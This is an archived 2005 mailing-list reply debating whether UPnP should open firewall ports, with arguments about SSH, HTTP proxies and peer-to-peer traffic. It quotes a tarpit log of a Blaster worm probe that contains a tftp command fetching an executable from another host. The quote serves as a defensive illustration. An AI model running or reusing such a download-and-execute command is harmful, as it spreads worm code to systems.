Firewall Wizards mailing list archives
Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP?
From: Chuck Swiger <chuck () codefab com>
Date: Wed, 1 Jun 2005 15:36:37 -0400
On Jun 1, 2005, at 5:01 AM, Darren Reed wrote:
An odd set of comments to make. I understand why UPnP is useful, and it is a fine thing for your LAN at home or maybe a tiny business which can't afford anyone to actually manage the network, but the people on this list ought to have some concern about security, too.Not really an odd set of comments, go ask on an openbsd or pf mailinglist if someone has developed a UPnP server yet and see how many abusivereplies you get back about it being insecure, etc. Luddites.
If you went on an OpenBSD or PF list and started telling people to scrap OpenBSD and install Linux instead because iptables has UPnP, color me unsurprised that you'd get abusive replies.
I don't see how permitting arbitrary services to go through can be a good idea from that standpoint, any more than permitting arbitrary RPC through is a good idea....Do you let ssh through a firewall?
Yes.
If you let that through, with tunnelling, you may as well be letting through arbitrary services.
Um, no, this argument is bogus. The potential risks from letting arbitrary services through and the risks of permitting SSH access are not similar, much less identical.
If you're letting HTTP thorugh a firewall, you're letting RPC through (remember SOAP ?)
Yes, and XML-RPC, and lots of other flavors, too. But then, one can hide a covert data channel over pretty much anything (using steganography with images, etc).
You shouldn't permit inbound HTTP to any box, just to machines which actually are intended to run an HTTP server. You shouldn't enable WebDAV and SOAP and other fancy bits unless you need them. And you hopefully shouldn't permit arbitrary outbound HTTP, either: forward those via a proxy server.
To the OP: why are you trying to do UPnP through a firewall? Why can't you put the devices which are permitted/expected to talk to each other with that kind of freedom on the same subnet?Ugh. You make it sound like you really don't understand UPnP or what he wants to do at all.
You sound like you can't make a point without indulging in personal attacks.
I understand Microsoft's Zeroconf, and Apple's Rendezvous (or Bonjour, now), just fine, both in terms of the multicast DNS service lookup/notifications, the auto-IP backoff strategy for not interfering with a DHCP server, and the mild changes to ARPOP_REQUEST and ARPOP_REPLY to avoid polluting the ARP cache when a node tries to autoconfig itself.
I'm also familiar with hosts poking at port 4444 and trying to do stuff like:
TCP: from IP=210.163.171.101:2968 to tarpit IP=199.103.21.236:4444 S TCP: from tarpit IP=199.103.21.236:4444 to IP=210.163.171.101:2968 SA TCP: from IP=210.163.171.101:2968 to tarpit IP=199.103.21.236:4444 PA TCP data: tftp -i 192.168.0.165 GET enbiei.exe .Of course, this particular Blaster scan came from a box using a private IP addr behind NAT and would not actually work, but the intent wasn't friendly.
UPnP is a firewall to host protocol/service, generally NOT something that goes through it.
This much, I'd agree with.
It's most often used by services running on an internal host that want to have someone connect in, but can't because of NAT.
UPnP is most often used by people who simply connect a printer to their LAN and print to it without manually configuring the network settings. Using UPnP for automaticly punching holes through firewalls strikes me as a dangerous idea.
Personally, I'd prefer to be able to configure a UPnP server than just open random ports, permanently on my firewall, wouldn't you?
No. I'd rather explicitly manage the services which are permitted through the firewall.
Would you rather have a static configuration for bittorrent that alwaysredirected port 6881-6889 (and had them open, regardless of whether or not your client was running) or configure a piece of software to open those ports, as required by the application?
If I cared about the security of the box in question, it wouldn't be running bittorrent or any other flavor of peer-to-peer networking.
People seem to think "oh no, devices can control the firewall and make it open everything!" - bah, that's just an implementation detail. Anyway, I could go on but I gotta run...
No doubt. -- -Chuck _______________________________________________ firewall-wizards mailing list firewall-wizards () honor icsalabs com http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
Current thread:
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Darren Reed (Jun 01)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Chuck Swiger (Jun 01)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Darren Reed (Jun 01)
- Message not available
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Chuck Swiger (Jun 02)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Darren Reed (Jun 02)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Chuck Swiger (Jun 02)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Darren Reed (Jun 04)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Paul D. Robertson (Jun 04)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Darren Reed (Jun 04)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Paul D. Robertson (Jun 04)
- RE: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? FirewallAdmin (Jun 10)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Darren Reed (Jun 01)
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Chuck Swiger (Jun 01)
- <Possible follow-ups>
- Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP? Siju George (Jun 02)